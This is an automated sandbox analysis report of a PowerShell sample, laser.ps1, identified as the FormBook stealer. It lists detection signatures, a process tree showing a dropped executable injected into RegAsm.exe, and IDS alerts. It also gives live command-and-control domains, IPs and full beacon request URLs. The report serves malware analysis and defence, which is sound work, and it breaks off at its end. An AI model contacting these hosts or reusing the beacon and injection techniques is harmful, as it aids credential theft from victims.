Edit tour

Windows Analysis Report
laser.ps1

Overview

General Information

Sample name:	laser.ps1
Analysis ID:	1618204
MD5:	7adf90b15de76e42932fa5e94c56a53d
SHA1:	675add13ec03deafbab37b6dfb03e78afcbd1cdc
SHA256:	1e03c070596fbe0b9568f8348fe91c6c0ec4c1f5540e48b1039940d47671205d
Tags:	ps1tumbetgirislinki-fituser-JAMESWT_MHT
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains very large strings

Allocates memory in foreign processes

Found direct / indirect Syscall (likely to bypass EDR)

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Powershell drops PE file

Queues an APC in another process (thread injection)

Suspicious execution chain found

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

powershell.exe (PID: 8104 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\laser.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 8112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

x.exe (PID: 5972 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 3A25D6429B34E260762DBEBB8D67AC09)

RegAsm.exe (PID: 6704 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

UmhFZco3dB3hLZpEx5uvm.exe (PID: 6240 cmdline: "C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\8EIn9gst2.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

runonce.exe (PID: 3488 cmdline: "C:\Windows\SysWOW64\runonce.exe" MD5: 9E16655119DDE1B24A741C4FD4AD08FC)

UmhFZco3dB3hLZpEx5uvm.exe (PID: 6720 cmdline: "C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\h4nXbCfA2.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

firefox.exe (PID: 6972 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

notepad.exe (PID: 7648 cmdline: "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\laser.ps1" MD5: 27F71B12CB585541885A31BE22F61C83)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000002.1752374705.0000000003F10000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.1748675402.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.2538512938.0000000003000000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000E.00000002.2540611173.00000000055C0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.1749625509.0000000002560000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.2538511146.00000000041E0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.2538743686.0000000004900000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.2528459776.0000000002C20000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: powershell.exe PID: 8104	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: powershell.exe PID: 8104	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x677:$b1: ::WriteAllBytes( 0x2856c2:$b1: ::WriteAllBytes( 0x693:$b2: ::FromBase64String( 0x2856de:$b2: ::FromBase64String( 0x1f2d63:$s1: -join 0x1ffe38:$s1: -join 0x20320a:$s1: -join 0x2038bc:$s1: -join 0x2053ad:$s1: -join 0x2075b3:$s1: -join 0x207dda:$s1: -join 0x20864a:$s1: -join 0x208d85:$s1: -join 0x208db7:$s1: -join 0x208dff:$s1: -join 0x208e1e:$s1: -join 0x20966e:$s1: -join 0x2097ea:$s1: -join 0x209862:$s1: -join 0x2098f5:$s1: -join 0x209b5b:$s1: -join
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.RegAsm.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
10.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\laser.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\laser.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1496, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\laser.ps1", ProcessId: 8104, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\laser.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\laser.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1496, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\laser.ps1", ProcessId: 8104, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T18:37:14.871378+0100	2855465	1	A Network Trojan was detected	192.168.2.10	49975	162.218.30.235	80	TCP
2025-02-18T18:37:43.794383+0100	2855465	1	A Network Trojan was detected	192.168.2.10	49979	103.106.67.112	80	TCP
2025-02-18T18:37:57.339174+0100	2855465	1	A Network Trojan was detected	192.168.2.10	49983	104.21.80.1	80	TCP
2025-02-18T18:38:12.008048+0100	2855465	1	A Network Trojan was detected	192.168.2.10	49987	104.21.64.1	80	TCP
2025-02-18T18:38:27.533272+0100	2855465	1	A Network Trojan was detected	192.168.2.10	49991	134.122.133.80	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T18:37:36.021397+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49976	103.106.67.112	80	TCP
2025-02-18T18:37:38.613700+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49977	103.106.67.112	80	TCP
2025-02-18T18:37:41.254634+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49978	103.106.67.112	80	TCP
2025-02-18T18:37:50.348646+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49980	104.21.80.1	80	TCP
2025-02-18T18:37:52.641774+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49981	104.21.80.1	80	TCP
2025-02-18T18:37:55.442051+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49982	104.21.80.1	80	TCP
2025-02-18T18:38:04.220935+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49984	104.21.64.1	80	TCP
2025-02-18T18:38:07.043109+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49985	104.21.64.1	80	TCP
2025-02-18T18:38:09.563384+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49986	104.21.64.1	80	TCP
2025-02-18T18:38:18.532056+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49988	134.122.133.80	80	TCP
2025-02-18T18:38:22.390272+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49989	134.122.133.80	80	TCP
2025-02-18T18:38:24.954593+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49990	134.122.133.80	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.l63339.xyz/vhr7/?6Z=-H-lpHxHXdyXU&zXA0DPZ=iaSfD1StI7hDT4qIAMii2AJAHOe0qHDn7gYmLjmbAGxKTACTDmsoqhtbBCAt1Ym3ncJClzXtgr7Snspij9c4v0DPw8ZKuIrimVv8q0baHQHWMGFSag==	Avira URL Cloud: Label: malware
Source: http://www.tumbetgirislinki.fit/k566/?6Z=-H-lpHxHXdyXU&zXA0DPZ=RARW43WNMKajmHoYlEtIRJLMiezSzeuXvXreCHJ6fEp5jkldk9mcWmm/U2k918FOdcoJ/x5nnQwLxIae2MHe9MdLjldesQy1X4jE5qPq3kNjfMeWlg==	Avira URL Cloud: Label: malware
Source: http://www.seasay.xyz/c9ts/?zXA0DPZ=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyaJnRUVMUOnSQnGJ4mxt7Tzpj06nHFHBYiovfB8EPfZSo8Ynzvw==&6Z=-H-lpHxHXdyXU	Avira URL Cloud: Label: malware
Source: http://www.lucynoel6465.shop/jgkl/?zXA0DPZ=hI+cEEoDMRK5HtHlz4V8IEOzbfVROUzo+nuR9x41ri89hVkyLZ4bVRvwmPB4YpqMZl4/b+D+8qc7dcfD2DlpZ+IqhGLZDTm5oFY7qBVg0wNSO9VUqA==&6Z=-H-lpHxHXdyXU	Avira URL Cloud: Label: malware
Source: https://www.seasay.xyz/c9ts/?zXA0DPZ=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExA	Avira URL Cloud: Label: malware
Source: http://www.kjuw.party/e0jv/?zXA0DPZ=T5a+nPXa7vHYgORYo4/nz9dQiuUIDqRyja1Bw4L97U3J4ftOxLqNqCnP0drWj2p7z+i5x9/xm7UTGnu+MMyQiOsx+uzJdiaZpwcLV+HQfwIlPX06/Q==&6Z=-H-lpHxHXdyXU	Avira URL Cloud: Label: malware
Source: http://www.kjuw.party/e0jv/	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\x.exe

Avira: detection malicious, Label: TR/Dropper.Gen

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\x.exe

ReversingLabs: Detection: 79%

Multi AV Scanner detection for submitted file

Source: laser.ps1	Virustotal: Detection: 49%			Perma Link
Source: laser.ps1	ReversingLabs: Detection: 37%

Yara detected FormBook

Source: Yara match	File source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1752374705.0000000003F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1748675402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2538512938.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2540611173.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1749625509.0000000002560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2538511146.00000000041E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2538743686.0000000004900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2528459776.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source:	Binary string: runonce.pdbGCTL source: RegAsm.exe, 0000000A.00000002.1749320441.0000000000ACA000.00000004.00000020.00020000.00000000.sdmp, UmhFZco3dB3hLZpEx5uvm.exe, 0000000C.00000002.2535807080.00000000012EE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegAsm.exe, 0000000A.00000002.1749802100.00000000027C0000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000D.00000003.1751415139.00000000049B6000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000D.00000003.1748918282.000000000480A000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000D.00000002.2539145094.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000D.00000002.2539145094.0000000004B60000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 0000000A.00000002.1749802100.00000000027C0000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, runonce.exe, 0000000D.00000003.1751415139.00000000049B6000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000D.00000003.1748918282.000000000480A000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000D.00000002.2539145094.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000D.00000002.2539145094.0000000004B60000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: runonce.pdb source: RegAsm.exe, 0000000A.00000002.1749320441.0000000000ACA000.00000004.00000020.00020000.00000000.sdmp, UmhFZco3dB3hLZpEx5uvm.exe, 0000000C.00000002.2535807080.00000000012EE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CXDFGDF.pdb source: powershell.exe, 00000002.00000002.1302140636.000000000668F000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000009.00000000.1292172273.0000000000242000.00000002.00000001.01000000.0000000A.sdmp, x.exe.2.dr
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UmhFZco3dB3hLZpEx5uvm.exe, 0000000C.00000000.1672162976.000000000040F000.00000002.00000001.01000000.0000000B.sdmp, UmhFZco3dB3hLZpEx5uvm.exe, 0000000E.00000000.1817091071.000000000040F000.00000002.00000001.01000000.0000000B.sdmp

Source: C:\Windows\SysWOW64\runonce.exe

Code function: 13_2_02C3C8D0 FindFirstFileW,FindNextFileW,FindClose,

13_2_02C3C8D0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Source: C:\Windows\SysWOW64\runonce.exe	Code function: 4x nop then xor eax, eax	13_2_02C29EF0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 4x nop then mov ebx, 00000004h	13_2_04A004E8
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 4x nop then pop edi	14_2_055F4D7F
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 4x nop then pop edi	14_2_055F4D3B
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 4x nop then xor eax, eax	14_2_055E977E
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 4x nop then pop edi	14_2_055E5F70
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 4x nop then pop edi	14_2_055E3F81
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 4x nop then pop edi	14_2_055F4E64
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 4x nop then pop edi	14_2_055F4E17
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 4x nop then pop edi	14_2_055F4EF5
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 4x nop then pop edi	14_2_055E5905

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49975 -> 162.218.30.235:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49985 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49986 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49989 -> 134.122.133.80:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49976 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49991 -> 134.122.133.80:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49983 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49979 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49988 -> 134.122.133.80:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49977 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49982 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49987 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49990 -> 134.122.133.80:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49978 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49984 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49980 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49981 -> 104.21.80.1:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.l63339.xyz
Source:	DNS query: www.seasay.xyz

Source: Joe Sandbox View	IP Address: 103.106.67.112 103.106.67.112
Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1
Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1
Source: Joe Sandbox View	IP Address: 134.122.133.80 134.122.133.80

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /vhr7/?6Z=-H-lpHxHXdyXU&zXA0DPZ=iaSfD1StI7hDT4qIAMii2AJAHOe0qHDn7gYmLjmbAGxKTACTDmsoqhtbBCAt1Ym3ncJClzXtgr7Snspij9c4v0DPw8ZKuIrimVv8q0baHQHWMGFSag== HTTP/1.1Host: www.l63339.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
Source: global traffic	HTTP traffic detected: GET /c9ts/?zXA0DPZ=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyaJnRUVMUOnSQnGJ4mxt7Tzpj06nHFHBYiovfB8EPfZSo8Ynzvw==&6Z=-H-lpHxHXdyXU HTTP/1.1Host: www.seasay.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
Source: global traffic	HTTP traffic detected: GET /k566/?6Z=-H-lpHxHXdyXU&zXA0DPZ=RARW43WNMKajmHoYlEtIRJLMiezSzeuXvXreCHJ6fEp5jkldk9mcWmm/U2k918FOdcoJ/x5nnQwLxIae2MHe9MdLjldesQy1X4jE5qPq3kNjfMeWlg== HTTP/1.1Host: www.tumbetgirislinki.fitAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
Source: global traffic	HTTP traffic detected: GET /jgkl/?zXA0DPZ=hI+cEEoDMRK5HtHlz4V8IEOzbfVROUzo+nuR9x41ri89hVkyLZ4bVRvwmPB4YpqMZl4/b+D+8qc7dcfD2DlpZ+IqhGLZDTm5oFY7qBVg0wNSO9VUqA==&6Z=-H-lpHxHXdyXU HTTP/1.1Host: www.lucynoel6465.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
Source: global traffic	HTTP traffic detected: GET /e0jv/?zXA0DPZ=T5a+nPXa7vHYgORYo4/nz9dQiuUIDqRyja1Bw4L97U3J4ftOxLqNqCnP0drWj2p7z+i5x9/xm7UTGnu+MMyQiOsx+uzJdiaZpwcLV+HQfwIlPX06/Q==&6Z=-H-lpHxHXdyXU HTTP/1.1Host: www.kjuw.partyAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5

Source: global traffic	DNS traffic detected: DNS query: www.l63339.xyz
Source: global traffic	DNS traffic detected: DNS query: www.seasay.xyz
Source: global traffic	DNS traffic detected: DNS query: www.tumbetgirislinki.fit
Source: global traffic	DNS traffic detected: DNS query: www.lucynoel6465.shop
Source: global traffic	DNS traffic detected: DNS query: www.kjuw.party

Source: unknown

